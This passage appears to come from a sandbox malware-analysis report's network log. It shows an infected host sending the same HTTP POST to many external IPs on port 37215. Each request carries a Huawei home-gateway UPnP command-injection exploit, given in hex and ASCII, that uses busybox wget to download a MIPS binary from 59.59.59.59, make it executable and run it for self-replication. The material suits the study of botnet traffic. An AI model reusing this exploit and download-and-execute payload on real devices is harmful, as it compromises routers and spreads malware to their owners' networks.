2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          135192.168.2.1560330197.51.251.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542412043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          136192.168.2.154364841.112.111.9637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542443991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          137192.168.2.1534494197.20.75.837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542478085 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          138192.168.2.153957466.33.91.25037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542488098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          139192.168.2.1551936197.236.230.20037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542486906 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          140192.168.2.1533566197.205.48.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542538881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          141192.168.2.155619441.14.108.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542547941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          142192.168.2.1554928157.195.67.20737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542547941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          143192.168.2.1542350126.114.181.17237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542623997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          144192.168.2.1549688197.63.145.4437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542628050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          145192.168.2.1558368197.242.106.12437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542643070 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
